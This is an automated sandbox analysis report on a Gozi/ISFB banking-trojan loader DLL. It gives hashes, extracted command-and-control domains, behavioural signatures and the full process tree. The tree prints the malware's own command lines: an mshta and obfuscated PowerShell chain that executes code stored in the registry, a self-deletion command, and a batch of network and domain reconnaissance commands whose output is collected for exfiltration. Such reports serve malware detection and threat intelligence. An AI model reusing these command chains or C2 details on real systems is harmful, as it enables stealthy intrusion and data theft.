Analysis
-
max time kernel
143s -
max time network
122s -
platform
windows7_x64 -
resource
win7-en-20211208 -
submitted
24/01/2022, 10:09
Static task
static1
Behavioral task
behavioral1
Sample
61ee6edf7de65.dll
Resource
win7-en-20211208
0 signatures
0 seconds
General
-
Target
61ee6edf7de65.dll
-
Size
95KB
-
MD5
b6f0fc5638a110abac1a54805f77e786
-
SHA1
f7eff5f67b1b794759ec0ba9b0d6a3bd5cd59bfe
-
SHA256
06e26611fe5cf2fb04cfa894f9cb24edc0ab8306cf42c979b2c776372d07d1cf
-
SHA512
b92f671821476bb041bd96a38b1ff300365d12d2fb6bec6266cfbd0f7613a3551807ddc3887ebee13911843322c3274af2a65ca1c38291b45506b433cccd15a8
Malware Config
Extracted
Family
gozi_ifsb
Botnet
20000
C2
giporedtrip.at
habpfans.at
Attributes
-
base_path
/drew/
-
build
260224
-
exe_type
loader
-
extension
.jlk
-
server_id
50
rsa_pubkey.plain
aes.plain
Extracted
Family
gozi_ifsb
Botnet
20000
C2
giporedtrip.at
habpfans.at
Attributes
-
base_path
/images/
-
build
260224
-
exe_type
worker
-
extension
.jlk
-
server_id
50
rsa_pubkey.plain
aes.plain
rsa_pubkey.plain
Signatures
-
Blocklisted process makes network request 3 IoCs
flow pid Process 3 2040 rundll32.exe 4 2040 rundll32.exe 5 2040 rundll32.exe -
Deletes itself 1 IoCs
pid Process 1592 cmd.exe -
Drops file in System32 directory 1 IoCs
description ioc Process File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe -
Suspicious use of SetThreadContext 4 IoCs
description pid Process procid_target PID 1048 set thread context of 1284 1048 powershell.exe 14 PID 1284 set thread context of 1592 1284 Explorer.EXE 38 PID 1592 set thread context of 916 1592 cmd.exe 40 PID 1284 set thread context of 1832 1284 Explorer.EXE 50 -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Discovers systems in the same network 1 TTPs 3 IoCs
pid Process 1240 net.exe 1544 net.exe 1592 net.exe -
Enumerates processes with tasklist 1 TTPs 1 IoCs
pid Process 1584 tasklist.exe -
Gathers system information 1 TTPs 1 IoCs
Runs systeminfo.exe.
pid Process 1368 systeminfo.exe -
description ioc Process Key created \REGISTRY\USER\S-1-5-21-2329389628-4064185017-3901522362-1000\Software\Microsoft\Internet Explorer\Main mshta.exe -
Runs net.exe
-
Runs ping.exe 1 TTPs 1 IoCs
pid Process 916 PING.EXE -
Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
pid Process 916 PING.EXE -
Suspicious behavior: EnumeratesProcesses 5 IoCs
pid Process 2040 rundll32.exe 1048 powershell.exe 1284 Explorer.EXE 1284 Explorer.EXE 1284 Explorer.EXE -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
pid Process 1284 Explorer.EXE -
Suspicious behavior: MapViewOfSection 4 IoCs
pid Process 1048 powershell.exe 1284 Explorer.EXE 1592 cmd.exe 1284 Explorer.EXE -
Suspicious use of AdjustPrivilegeToken 2 IoCs
description pid Process Token: SeDebugPrivilege 1048 powershell.exe Token: SeDebugPrivilege 1584 tasklist.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
pid Process 1284 Explorer.EXE -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 1900 wrote to memory of 2040 1900 rundll32.exe 27 PID 1900 wrote to memory of 2040 1900 rundll32.exe 27 PID 1900 wrote to memory of 2040 1900 rundll32.exe 27 PID 1900 wrote to memory of 2040 1900 rundll32.exe 27 PID 1900 wrote to memory of 2040 1900 rundll32.exe 27 PID 1900 wrote to memory of 2040 1900 rundll32.exe 27 PID 1900 wrote to memory of 2040 1900 rundll32.exe 27 PID 1176 wrote to memory of 1048 1176 mshta.exe 31 PID 1176 wrote to memory of 1048 1176 mshta.exe 31 PID 1176 wrote to memory of 1048 1176 mshta.exe 31 PID 1048 wrote to memory of 1028 1048 powershell.exe 34 PID 1048 wrote to memory of 1028 1048 powershell.exe 34 PID 1048 wrote to memory of 1028 1048 powershell.exe 34 PID 1028 wrote to memory of 1888 1028 csc.exe 35 PID 1028 wrote to memory of 1888 1028 csc.exe 35 PID 1028 wrote to memory of 1888 1028 csc.exe 35 PID 1048 wrote to memory of 752 1048 powershell.exe 36 PID 1048 wrote to memory of 752 1048 powershell.exe 36 PID 1048 wrote to memory of 752 1048 powershell.exe 36 PID 752 wrote to memory of 264 752 csc.exe 37 PID 752 wrote to memory of 264 752 csc.exe 37 PID 752 wrote to memory of 264 752 csc.exe 37 PID 1048 wrote to memory of 1284 1048 powershell.exe 14 PID 1048 wrote to memory of 1284 1048 powershell.exe 14 PID 1048 wrote to memory of 1284 1048 powershell.exe 14 PID 1284 wrote to memory of 1592 1284 Explorer.EXE 38 PID 1284 wrote to memory of 1592 1284 Explorer.EXE 38 PID 1284 wrote to memory of 1592 1284 Explorer.EXE 38 PID 1284 wrote to memory of 1592 1284 Explorer.EXE 38 PID 1284 wrote to memory of 1592 1284 Explorer.EXE 38 PID 1284 wrote to memory of 1592 1284 Explorer.EXE 38 PID 1592 wrote to memory of 916 1592 cmd.exe 40 PID 1592 wrote to memory of 916 1592 cmd.exe 40 PID 1592 wrote to memory of 916 1592 cmd.exe 40 PID 1592 wrote to memory of 916 1592 cmd.exe 40 PID 1592 wrote to memory of 916 1592 cmd.exe 40 PID 1592 wrote to memory of 916 1592 cmd.exe 40 PID 1284 wrote to memory of 1612 1284 Explorer.EXE 41 PID 1284 wrote to memory of 1612 1284 Explorer.EXE 41 PID 1284 wrote to memory of 1612 1284 Explorer.EXE 41 PID 1612 wrote to memory of 1072 1612 cmd.exe 43 PID 1612 wrote to memory of 1072 1612 cmd.exe 43 PID 1612 wrote to memory of 1072 1612 cmd.exe 43 PID 1284 wrote to memory of 1020 1284 Explorer.EXE 44 PID 1284 wrote to memory of 1020 1284 Explorer.EXE 44 PID 1284 wrote to memory of 1020 1284 Explorer.EXE 44 PID 1284 wrote to memory of 748 1284 Explorer.EXE 46 PID 1284 wrote to memory of 748 1284 Explorer.EXE 46 PID 1284 wrote to memory of 748 1284 Explorer.EXE 46 PID 748 wrote to memory of 1368 748 cmd.exe 48 PID 748 wrote to memory of 1368 748 cmd.exe 48 PID 748 wrote to memory of 1368 748 cmd.exe 48 PID 1284 wrote to memory of 1832 1284 Explorer.EXE 50 PID 1284 wrote to memory of 1832 1284 Explorer.EXE 50 PID 1284 wrote to memory of 1832 1284 Explorer.EXE 50 PID 1284 wrote to memory of 1832 1284 Explorer.EXE 50 PID 1284 wrote to memory of 1832 1284 Explorer.EXE 50 PID 1284 wrote to memory of 1832 1284 Explorer.EXE 50 PID 1284 wrote to memory of 1832 1284 Explorer.EXE 50 PID 1284 wrote to memory of 1800 1284 Explorer.EXE 52 PID 1284 wrote to memory of 1800 1284 Explorer.EXE 52 PID 1284 wrote to memory of 1800 1284 Explorer.EXE 52 PID 1284 wrote to memory of 980 1284 Explorer.EXE 54 PID 1284 wrote to memory of 980 1284 Explorer.EXE 54
Processes
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1284 -
C:\Windows\system32\rundll32.exerundll32.exe C:\Users\Admin\AppData\Local\Temp\61ee6edf7de65.dll,#12⤵
- Suspicious use of WriteProcessMemory
PID:1900 -
C:\Windows\SysWOW64\rundll32.exerundll32.exe C:\Users\Admin\AppData\Local\Temp\61ee6edf7de65.dll,#13⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
PID:2040
-
-
-
C:\Windows\System32\mshta.exe"C:\Windows\System32\mshta.exe" "about:<hta:application><script>Shva='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Shva).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\A97B9ACF-F490-C387-46ED-68A7DA711CCB\\\StartDevice'));if(!window.flag)close()</script>"2⤵
- Modifies Internet Explorer settings
- Suspicious use of WriteProcessMemory
PID:1176 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name micdnux -value gp; new-alias -name wsfkguhx -value iex; wsfkguhx ([System.Text.Encoding]::ASCII.GetString((micdnux "HKCU:Software\AppDataLow\Software\Microsoft\A97B9ACF-F490-C387-46ED-68A7DA711CCB").OptionsAbout))3⤵
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1048 -
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe"C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\ffdjt0df.cmdline"4⤵
- Suspicious use of WriteProcessMemory
PID:1028 -
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES52D2.tmp" "c:\Users\Admin\AppData\Local\Temp\CSC52C2.tmp"5⤵PID:1888
-
-
-
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe"C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\7cp2lteu.cmdline"4⤵
- Suspicious use of WriteProcessMemory
PID:752 -
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES535F.tmp" "c:\Users\Admin\AppData\Local\Temp\CSC535E.tmp"5⤵PID:264
-
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C ping localhost -n 5 && del "C:\Users\Admin\AppData\Local\Temp\61ee6edf7de65.dll"2⤵
- Deletes itself
- Suspicious use of SetThreadContext
- Suspicious behavior: MapViewOfSection
- Suspicious use of WriteProcessMemory
PID:1592 -
C:\Windows\system32\PING.EXEping localhost -n 53⤵
- Runs ping.exe
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:916
-
-
-
C:\Windows\system32\cmd.execmd /C "nslookup myip.opendns.com resolver1.opendns.com > C:\Users\Admin\AppData\Local\Temp\B840.bi1"2⤵
- Suspicious use of WriteProcessMemory
PID:1612 -
C:\Windows\system32\nslookup.exenslookup myip.opendns.com resolver1.opendns.com3⤵PID:1072
-
-
-
C:\Windows\system32\cmd.execmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\B840.bi1"2⤵PID:1020
-
-
C:\Windows\system32\cmd.execmd /C "systeminfo.exe > C:\Users\Admin\AppData\Local\Temp\4868.bin1"2⤵
- Suspicious use of WriteProcessMemory
PID:748 -
C:\Windows\system32\systeminfo.exesysteminfo.exe3⤵
- Gathers system information
PID:1368
-
-
-
C:\Windows\syswow64\cmd.exe"C:\Windows\syswow64\cmd.exe" /C pause dll mail, ,2⤵PID:1832
-
-
C:\Windows\system32\cmd.execmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\4868.bin1"2⤵PID:1800
-
-
C:\Windows\system32\cmd.execmd /C "net view >> C:\Users\Admin\AppData\Local\Temp\4868.bin1"2⤵PID:980
-
C:\Windows\system32\net.exenet view3⤵
- Discovers systems in the same network
PID:1240
-
-
-
C:\Windows\system32\cmd.execmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\4868.bin1"2⤵PID:520
-
-
C:\Windows\system32\cmd.execmd /C "nslookup 127.0.0.1 >> C:\Users\Admin\AppData\Local\Temp\4868.bin1"2⤵PID:2040
-
C:\Windows\system32\nslookup.exenslookup 127.0.0.13⤵PID:1604
-
-
-
C:\Windows\system32\cmd.execmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\4868.bin1"2⤵PID:1720
-
-
C:\Windows\system32\cmd.execmd /C "tasklist.exe /SVC >> C:\Users\Admin\AppData\Local\Temp\4868.bin1"2⤵PID:1612
-
C:\Windows\system32\tasklist.exetasklist.exe /SVC3⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:1584
-
-
-
C:\Windows\system32\cmd.execmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\4868.bin1"2⤵PID:308
-
-
C:\Windows\system32\cmd.execmd /C "driverquery.exe >> C:\Users\Admin\AppData\Local\Temp\4868.bin1"2⤵PID:1620
-
C:\Windows\system32\driverquery.exedriverquery.exe3⤵PID:912
-
-
-
C:\Windows\system32\cmd.execmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\4868.bin1"2⤵PID:1776
-
-
C:\Windows\system32\cmd.execmd /C "reg.exe query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall" /s >> C:\Users\Admin\AppData\Local\Temp\4868.bin1"2⤵PID:1404
-
C:\Windows\system32\reg.exereg.exe query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall" /s3⤵PID:440
-
-
-
C:\Windows\system32\cmd.execmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\4868.bin1"2⤵PID:1496
-
-
C:\Windows\system32\cmd.execmd /C "net config workstation >> C:\Users\Admin\AppData\Local\Temp\4868.bin1"2⤵PID:1668
-
C:\Windows\system32\net.exenet config workstation3⤵PID:1960
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 config workstation4⤵PID:1240
-
-
-
-
C:\Windows\system32\cmd.execmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\4868.bin1"2⤵PID:768
-
-
C:\Windows\system32\cmd.execmd /C "nltest /domain_trusts >> C:\Users\Admin\AppData\Local\Temp\4868.bin1"2⤵PID:1416
-
C:\Windows\system32\nltest.exenltest /domain_trusts3⤵PID:2040
-
-
-
C:\Windows\system32\cmd.execmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\4868.bin1"2⤵PID:1616
-
-
C:\Windows\system32\cmd.execmd /C "nltest /domain_trusts /all_trusts >> C:\Users\Admin\AppData\Local\Temp\4868.bin1"2⤵PID:1508
-
C:\Windows\system32\nltest.exenltest /domain_trusts /all_trusts3⤵PID:1384
-
-
-
C:\Windows\system32\cmd.execmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\4868.bin1"2⤵PID:1552
-
-
C:\Windows\system32\cmd.execmd /C "net view /all /domain >> C:\Users\Admin\AppData\Local\Temp\4868.bin1"2⤵PID:308
-
C:\Windows\system32\net.exenet view /all /domain3⤵
- Discovers systems in the same network
PID:1544
-
-
-
C:\Windows\system32\cmd.execmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\4868.bin1"2⤵PID:1740
-
-
C:\Windows\system32\cmd.execmd /C "net view /all >> C:\Users\Admin\AppData\Local\Temp\4868.bin1"2⤵PID:1736
-
C:\Windows\system32\net.exenet view /all3⤵
- Discovers systems in the same network
PID:1592
-
-
-
C:\Windows\system32\cmd.execmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\4868.bin1"2⤵PID:816
-
-
C:\Windows\system32\cmd.execmd /U /C "type C:\Users\Admin\AppData\Local\Temp\4868.bin1 > C:\Users\Admin\AppData\Local\Temp\4868.bin & del C:\Users\Admin\AppData\Local\Temp\4868.bin1"2⤵PID:1496
-